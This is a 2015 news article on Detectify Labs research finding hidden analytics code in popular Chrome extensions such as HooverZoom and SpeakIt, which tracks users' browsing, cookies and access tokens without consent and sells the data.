Hidden analytics code tracks everything users do, EVERYTHING

Nov 23, 2015 17:58 GMT  ·  By

Analytics code deeply hidden in popular Google Chrome extensions is being used to track users across the Web, in different browser tabs, and without user consent.

Swedish company Detectify Labs made this discovery, and its researchers are pointing the finger at popular extensions like HooverZoom, SpeakIt, ProxFlow, Instant Translate, FB Color Changer, SafeBrowse, JavaScript Error Notifier, SuperBlock AdBlocker, and more.

According to Detectify researchers, the extensions that engage in such practices are doing it without obtaining user consent, have the tracking feature enabled by default, and also have dodgy user privacy policies to begin with.

Analytics providers are tracking much more than the user's browsing history

Detectify's team has observed Chrome extensions track not only the user's browser history but also data from cookies, secret access tokens from Facebook Connect and links to private Dropbox or Google Drive files.

While it is understandable for analytics providers to be interested in getting their grubby little hands on user details through any means they can, the methods employed via Chrome extensions are bordering criminal activity.

The analytics providers where all this information ends up are providing anyone with an open wallet access to the sensitive data. The researchers even signed up for one such service and after sifting through the warehoused data, they were able to find internal PDFs uploaded to AWS servers, Intranet URLs that could compromise a company's internal network structure, and common URLs used by employees on targeted competitors.

An extension's tracking code could update itself, even if the extension was abandoned

Researchers even observed one sneaky analytics SDK that included a self-updating functionality that would work even if the extension was never updated. This allowed the analytics company to update the tracking code and add new functionality, even if the extension's author abandoned his project.

Detecting such extensions is also tricky since most of them use a separate extension process in the browser's background to carry out their snooping activities.

Above all, researchers blame the extensions' authors who, in their quest to monetize their code, allow such snakes to nestle in their add-ons.

"We’ve seen some indications on Chrome Extension-forums that it’s around $0.04 per user/month," says Linus Särud and Frans Rosén of Detectify Labs. "For plugins with over tens and hundreds of thousands of users that equals [to] a substantial amount of monthly income."

As for Firefox add-ons, the researchers analyzed only one extension and found it to have a similar functionality.